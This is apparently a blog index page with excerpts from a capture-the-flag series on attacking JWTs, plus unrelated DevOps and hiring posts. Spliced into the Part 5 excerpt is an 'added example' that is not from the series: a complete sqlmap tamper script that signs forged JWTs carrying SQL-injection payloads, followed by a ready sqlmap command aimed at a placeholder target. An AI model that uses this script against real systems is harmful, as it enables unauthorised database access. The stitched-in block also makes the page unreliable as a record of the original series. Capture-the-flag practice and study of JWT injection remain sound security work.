Security

Capture The Flag (CTF) Challenge – Part 5

This entry is part 5 of 5 in the series Capture The Flag

Attacking JWTs with a Custom SQLmap Tamper Script
Automating the Attack with SQLmap and a Custom Tamper Script
Let’s review what I know and where I’m at in capturing the flag: the web server is NodeJS Express, the database is SQLite, and the hole in the wall is the JSON Web Token. The JWT username field is vulnerable…

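The series title names the technique but the listing above does not show it, so here is an added example of what such a tamper script looks like. It is not code from the series or its author. It assumes, because the page does not say, that the token is an HS256 JWT whose signing secret is already known, that the vulnerable claim is named `username`, and that the token travels in a cookie named `token`; the secret value and the file name `jwt_username.py` are placeholders. The JWT helpers are written by hand (HMAC over the base64url header and payload) so the file runs with no third-party packages, and the `sqlmap` import is guarded so the same file can be run and tested outside sqlmap.

```python
"""jwt_username.py: constructed sqlmap tamper script for a SQL-injectable JWT claim.

Assumptions (not stated on the original page): HS256, known secret,
injectable claim "username", token carried in a cookie named "token".
"""
import base64
import hashlib
import hmac
import json

try:
    from lib.core.enums import PRIORITY  # present only when loaded by sqlmap
except ImportError:  # stand-alone run or test harness
    class PRIORITY:  # minimal stand-in so the module still imports
        NORMAL = 0

__priority__ = PRIORITY.NORMAL

# Placeholder secret; on a real engagement this is the recovered signing key.
SECRET = b"example-secret"


def dependencies():
    """sqlmap hook; nothing extra is needed."""
    pass


def _b64url(data: bytes) -> str:
    """base64url without padding, as JWT requires."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64url_decode(text: str) -> bytes:
    """Inverse of _b64url; restores the padding base64 needs."""
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_jwt(claims: dict, secret: bytes = SECRET) -> str:
    """Build an HS256 JWT: base64url(header).base64url(claims).base64url(hmac)."""
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = (
        _b64url(json.dumps(header, separators=(",", ":")).encode())
        + "."
        + _b64url(json.dumps(claims, separators=(",", ":")).encode())
    )
    sig = hmac.new(secret, signing_input.encode("ascii"), hashlib.sha256).digest()
    return signing_input + "." + _b64url(sig)


def signature_ok(token: str, secret: bytes = SECRET) -> bool:
    """True if the token's HMAC matches; this is what the server's verify step does."""
    head, body, sig = token.split(".")
    expected = hmac.new(secret, f"{head}.{body}".encode("ascii"), hashlib.sha256).digest()
    return hmac.compare_digest(expected, _b64url_decode(sig))


def verify_jwt(token: str, secret: bytes = SECRET) -> dict:
    """Return the claims of a correctly signed token, or raise ValueError."""
    if not signature_ok(token, secret):
        raise ValueError("bad signature")
    return json.loads(_b64url_decode(token.split(".")[1]))


def tamper(payload, **kwargs):
    """sqlmap entry point.

    sqlmap hands over the raw SQL payload (e.g. "' OR 1=1--") and replaces the
    '*' marker in the request with whatever this returns. Because the marker
    stands for the whole cookie value, we return a complete, freshly signed
    token whose username claim carries the payload, so the server's signature
    check passes and the injected string reaches the SQLite query.
    """
    claims = {"username": payload or "", "iat": 0}
    return sign_jwt(claims)


if __name__ == "__main__":
    # Constructed demonstration: the payload survives signing and verification.
    token = tamper("admin' OR 1=1--")
    print(token)
    print(verify_jwt(token)["username"])
```

Drop the file into sqlmap's `tamper/` directory and invoke it with the injection point marked on the cookie value, for example `sqlmap -u https://target/api/profile --cookie="token=*" --tamper=jwt_username --dbms=SQLite` (the URL is a placeholder). The design point is the contrast with the algorithm attacks mentioned in Part 4: this script does not weaken the signature at all; it keeps every token valid and lets sqlmap do its normal boolean and time-based probing through a claim the application trusts once the signature checks out.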
Security

Capture The Flag (CTF) Challenge – Part 4

This entry is part 4 of 5 in the series Capture The Flag

Attacking JWTs with a Custom SQLmap Tamper Script
The Path of Attack
After reading the documentation on JWTs, I decided that this will be my next path of attack. There were a few hints to push me down this path. First, I looked up JWT vulnerabilities. Most attack techniques go after the algorithm for signing…

Security

Capture The Flag (CTF) Challenge – Part 3

This entry is part 3 of 5 in the series Capture The Flag

Attacking JWTs with a Custom SQLmap Tamper Script
Digging Deeper into the Code
Let’s start to look under the hood of the site some more. Maybe the developers left a comment in the website code pointing to a hole. Maybe some JavaScript gets loaded that holds the vulnerability. Whatever it is, I have to look…

Security

Capture The Flag (CTF) Challenge – Part 1

This entry is part 1 of 5 in the series Capture The Flag

Attacking JWTs with a Custom SQLmap Tamper Script
Introduction
If you’ve ever watched a movie or TV show that involves computer “hacking”, you’ll recognize these scenes. Someone wearing a hoodie (of course) hunched over six monitors of scrolling text, frantically typing and instantly programming some complex code to break past a firewall. My favourite (facepalming)…

DevOps

Making the most of Grafana open source dashboards

I came across this recent blog post on OpenSource.com about the Top 10 Grafana Features. We too love Grafana, of course (blog post). It’s amazing that a project under 7 years old already has over half a million installations! Here are the top features of Grafana that we use ourselves, or help our…

People

3 Keys To Nurture Your ‘A’ Player

So you’ve just hired an A player in a technical role – young, super “green,” and with all the potential in the world. You’ve developed and taken her through a tight onboarding program; a couple of weeks of learning, training, and culture-infusion. She’s hooked and ready to start real work. Now what? Here are three things…
